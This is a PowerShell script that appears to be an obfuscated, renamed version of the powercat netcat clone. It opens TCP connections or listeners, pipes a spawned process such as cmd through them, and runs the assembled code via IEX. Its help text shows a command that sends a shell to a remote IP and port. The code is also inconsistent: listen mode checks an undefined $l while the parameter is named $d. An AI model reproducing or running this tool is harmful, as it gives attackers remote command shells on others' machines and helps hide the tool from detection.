function xyz
{
  param(
    [alias("Client")][string]$a="",
    [alias("Listen")][switch]$d=$False,
    [alias("Port")][Parameter(Position=-1)][string]$b="",
    [alias("Execute")][string]$c=""
  )
  
  ############### HELP ###############
  $h1 = "
powercat - Netcat, The Powershell Version (Simplified)

Usage: powercat [-a or -l] [-b port] [-c process]

  -a  <ip>        Client Mode. Provide the IP of the system you wish to connect to.

  -b  <port>      Port. The port to connect to, or the port to listen on.
  
  -c  <proc>      Execute. Specify the name of the process to start.

Examples:

  Listen on port 8000 and print the output to the console.
      powercat -l -b 8000
  
  Connect to 10.1.1.1 port 443 and send a shell.
      powercat -a 192.168.111.151 -b 1234 -c cmd
"
  
  ############### VALIDATE ARGS ###############
  if((($a -eq "") -and (!$l)) -or (($a -ne "") -and $l)){return "You must select either client mode (-a) or listen mode (-l)."}
  if($b -eq ""){return "Please provide a port number to -b."}
  
  if($l)
  {
    $f1 = $False
    netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $b){Write-Output ("The selected port " + $b + " is already in use.") ; $f1=$True}}
    if($f1){break}
  }
  ############### VALIDATE ARGS ###############
  
  ########## TCP FUNCTIONS ##########
  function k1
  {
    param($v1)
    $a,$l,$b,$t = $v1
    $v2 = @{}
    if(!$l)
    {
      $v2["l"] = $False
      $s1 = New-Object System.Net.Sockets.TcpClient
      Write-Host "Connecting..."
      $h2 = $s1.BeginConnect($a,$b,$null,$null)
    }
    else
    {
      $v2["l"] = $True
      Write-Host ("Listening on [0.0.0.0] (port " + $b + ")")
      $s1 = New-Object System.Net.Sockets.TcpListener $b
      $s1.Start()
      $h2 = $s1.BeginAcceptTcpClient($null, $null)
    }
    
    $w1 = [System.Diagnostics.Stopwatch]::StartNew()
    while($True)
    {
      if($Host.UI.RawUI.KeyAvailable)
      {
        if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown,IncludeKeyUp").VirtualKeyCode))
        {
          Write-Host "CTRL or ESC caught. Stopping TCP Setup..."
          if($v2["l"]){$s1.Stop()}
          else{$s1.Close()}
          $w1.Stop()
          break
        }
      }
      if($w1.Elapsed.TotalSeconds -gt 60)
      {
        if(!$l){$s1.Close()}
        else{$s1.Stop()}
        $w1.Stop()
        Write-Host "Timeout!" ; break
        break
      }
      if($h2.IsCompleted)
      {
        if(!$l)
        {
          try
          {
            $s1.EndConnect($h2)
            $m1 = $s1.GetStream()
            $b1 = $s1.ReceiveBufferSize
            Write-Host ("Connection to " + $a + ":" + $b + " [tcp] succeeded!")
          }
          catch{$s1.Close(); $w1.Stop(); break}
        }
        else
        {
          $c1 = $s1.EndAcceptTcpClient($h2)
          $m1 = $c1.GetStream()
          $b1 = $c1.ReceiveBufferSize
          Write-Host ("Connection from [" + $c1.Client.RemoteEndPoint.Address.IPAddressToString + "] port " + $b + " [tcp] accepted (source port " + $c1.Client.RemoteEndPoint.Port + ")")
        }
        break
      }
    }
    $w1.Stop()
    if($s1 -eq $null){break}
    $v2["Stream"] = $m1
    $v2["Socket"] = $s1
    $v2["BufferSize"] = $b1
    $v2["StreamDestinationBuffer"] = (New-Object System.Byte[] $v2["BufferSize"])
    $v2["StreamReadOperation"] = $v2["Stream"].BeginRead($v2["StreamDestinationBuffer"], 0, $v2["BufferSize"], $null, $null)
    $v2["Encoding"] = New-Object System.Text.AsciiEncoding
    $v2["StreamBytesRead"] = 1
    return $v2
  }
  function k2
  {
    param($v2)
    $d1 = $null
    if($v2["StreamBytesRead"] -eq 0){break}
    if($v2["StreamReadOperation"].IsCompleted)
    {
      $r1 = $v2["Stream"].EndRead($v2["StreamReadOperation"])
      if($r1 -eq 0){break}
      $d1 = $v2["StreamDestinationBuffer"][0..([int]$r1-1)]
      $v2["StreamReadOperation"] = $v2["Stream"].BeginRead($v2["StreamDestinationBuffer"], 0, $v2["BufferSize"], $null, $null)
    }
    return $d1,$v2
  }
  function k3
  {
    param($d1,$v2)
    $v2["Stream"].Write($d1, 0, $d1.Length)
    return $v2
  }
  function k4
  {
    param($v2)
    try{$v2["Stream"].Close()}
    catch{}
    if($v2["l"]){$v2["Socket"].Stop()}
    else{$v2["Socket"].Close()}
  }
  ########## TCP FUNCTIONS ##########
  
  ########## CMD FUNCTIONS ##########
  function p1
  {
    param($v1)
    $v2 = @{}
    $i1 = New-Object System.Diagnostics.ProcessStartInfo
    $i1.FileName = $v1[0]
    $i1.UseShellExecute = $False
    $i1.RedirectStandardInput = $True
    $i1.RedirectStandardOutput = $True
    $i1.RedirectStandardError = $True
    $v2["Process"] = [System.Diagnostics.Process]::Start($i1)
    Write-Host ("Starting Process " + $v1[0] + "...")
    $v2["Process"].Start() | Out-Null
    $v2["StdOutDestinationBuffer"] = New-Object System.Byte[] 65536
    $v2["StdOutReadOperation"] = $v2["Process"].StandardOutput.BaseStream.BeginRead($v2["StdOutDestinationBuffer"], 0, 65536, $null, $null)
    $v2["StdErrDestinationBuffer"] = New-Object System.Byte[] 65536
    $v2["StdErrReadOperation"] = $v2["Process"].StandardError.BaseStream.BeginRead($v2["StdErrDestinationBuffer"], 0, 65536, $null, $null)
    $v2["Encoding"] = New-Object System.Text.AsciiEncoding
    return $v2
  }
  function p2
  {
    param($v2)
    [byte[]]$d1 = @()
    if($v2["StdOutReadOperation"].IsCompleted)
    {
      $r2 = $v2["Process"].StandardOutput.BaseStream.EndRead($v2["StdOutReadOperation"])
      if($r2 -eq 0){break}
      $d1 += $v2["StdOutDestinationBuffer"][0..([int]$r2-1)]
      $v2["StdOutReadOperation"] = $v2["Process"].StandardOutput.BaseStream.BeginRead($v2["StdOutDestinationBuffer"], 0, 65536, $null, $null)
    }
    if($v2["StdErrReadOperation"].IsCompleted)
    {
      $r3 = $v2["Process"].StandardError.BaseStream.EndRead($v2["StdErrReadOperation"])
      if($r3 -eq 0){break}
      $d1 += $v2["StdErrDestinationBuffer"][0..([int]$r3-1)]
      $v2["StdErrReadOperation"] = $v2["Process"].StandardError.BaseStream.BeginRead($v2["StdErrDestinationBuffer"], 0, 65536, $null, $null)
    }
    return $d1,$v2
  }
  function p3
  {
    param($d1,$v2)
    $v2["Process"].StandardInput.WriteLine($v2["Encoding"].GetString($d1).TrimEnd("`r").TrimEnd("`n"))
    return $v2
  }
  function p4
  {
    param($v2)
    $v2["Process"] | Stop-Process
  }  
  ########## CMD FUNCTIONS ##########

  ########## CONSOLE FUNCTIONS ##########
  function n1
  {
    param($v1)
    $v2 = @{}
    $v2["Encoding"] = New-Object System.Text.AsciiEncoding
    return $v2
  }
  function n2
  {
    param($v2)
    $d1 = $null
    if($Host.UI.RawUI.KeyAvailable)
    {
      $d1 = $v2["Encoding"].GetBytes((Read-Host) + "`n")
    }
    return $d1,$v2
  }
  function n3
  {
    param($d1,$v2)
    Write-Host -n $v2["Encoding"].GetString($d1)
    return $v2
  }
  function n4
  {
    param($v2)
    return
  }
  ########## CONSOLE FUNCTIONS ##########
  
  ########## MAIN FUNCTION ##########
  function m1
  {
    param($s1,$s2)
    try
    {
      Write-Host "Setting up Stream 1..."
      try{$v3 = x1 $s1}
      catch{Write-Host "Stream 1 Setup Failure" ; return}
      
      Write-Host "Setting up Stream 2..."
      try{$v4 = x2 $s2}
      catch{Write-Host "Stream 2 Setup Failure" ; return}
      
      $d1 = $null
      
      Write-Host "Both Communication Streams Established. Redirecting Data Between Streams..."
      while($True)
      {
        try
        {
          $d1,$v4 = x4 $v4
          if(($d1.Length -eq 0) -or ($d1 -eq $null)){Start-Sleep -Milliseconds 100}
          if($d1 -ne $null){$v3 = x3 $d1 $v3}
          $d1 = $null
        }
        catch
        {
          Write-Host "Failed to redirect data from Stream 2 to Stream 1" ; return
        }
        
        try
        {
          $d1,$v3 = x5 $v3
          if(($d1.Length -eq 0) -or ($d1 -eq $null)){Start-Sleep -Milliseconds 100}
          if($d1 -ne $null){$v4 = x6 $d1 $v4}
          $d1 = $null
        }
        catch
        {
          Write-Host "Failed to redirect data from Stream 1 to Stream 2" ; return
        }
      }
    }
    finally
    {
      try
      {
        x8 $v4
      }
      catch
      {
        Write-Host "Failed to close Stream 2"
      }
      try
      {
        x7 $v3
      }
      catch
      {
        Write-Host "Failed to close Stream 1"
      }
    }
  }
  ########## MAIN FUNCTION ##########
  
  ########## EXECUTION ##########
  # Set up TCP as Stream 1
  $f2 = ("function x1`n{`n" + ${function:k1} + "`n}`n`n")
  $f2 += ("function x5`n{`n" + ${function:k2} + "`n}`n`n")
  $f2 += ("function x3`n{`n" + ${function:k3} + "`n}`n`n")
  $f2 += ("function x7`n{`n" + ${function:k4} + "`n}`n`n")
  
  if($l){$i2 = "m1 @('',`$True,$b,60) "}
  else{$i2 = "m1 @('$a',`$False,$b,60) "}
  
  # Set up Stream 2 based on -c parameter
  if($c -ne "")
  {
    $f2 += ("function x2`n{`n" + ${function:p1} + "`n}`n`n")
    $f2 += ("function x4`n{`n" + ${function:p2} + "`n}`n`n")
    $f2 += ("function x6`n{`n" + ${function:p3} + "`n}`n`n")
    $f2 += ("function x8`n{`n" + ${function:p4} + "`n}`n`n")
    $i2 += "@('$c')`n`n"
  }
  else
  {
    $f2 += ("function x2`n{`n" + ${function:n1} + "`n}`n`n")
    $f2 += ("function x4`n{`n" + ${function:n2} + "`n}`n`n")
    $f2 += ("function x6`n{`n" + ${function:n3} + "`n}`n`n")
    $f2 += ("function x8`n{`n" + ${function:n4} + "`n}`n`n")
    $i2 += "@()"
  }
  
  $f2 += ("function m1`n{`n" + ${function:m1} + "`n}`n`n")
  $i2 = ($f2 + $i2)
  
  # Execute the payload
  IEX $i2
  ########## EXECUTION ##########
} 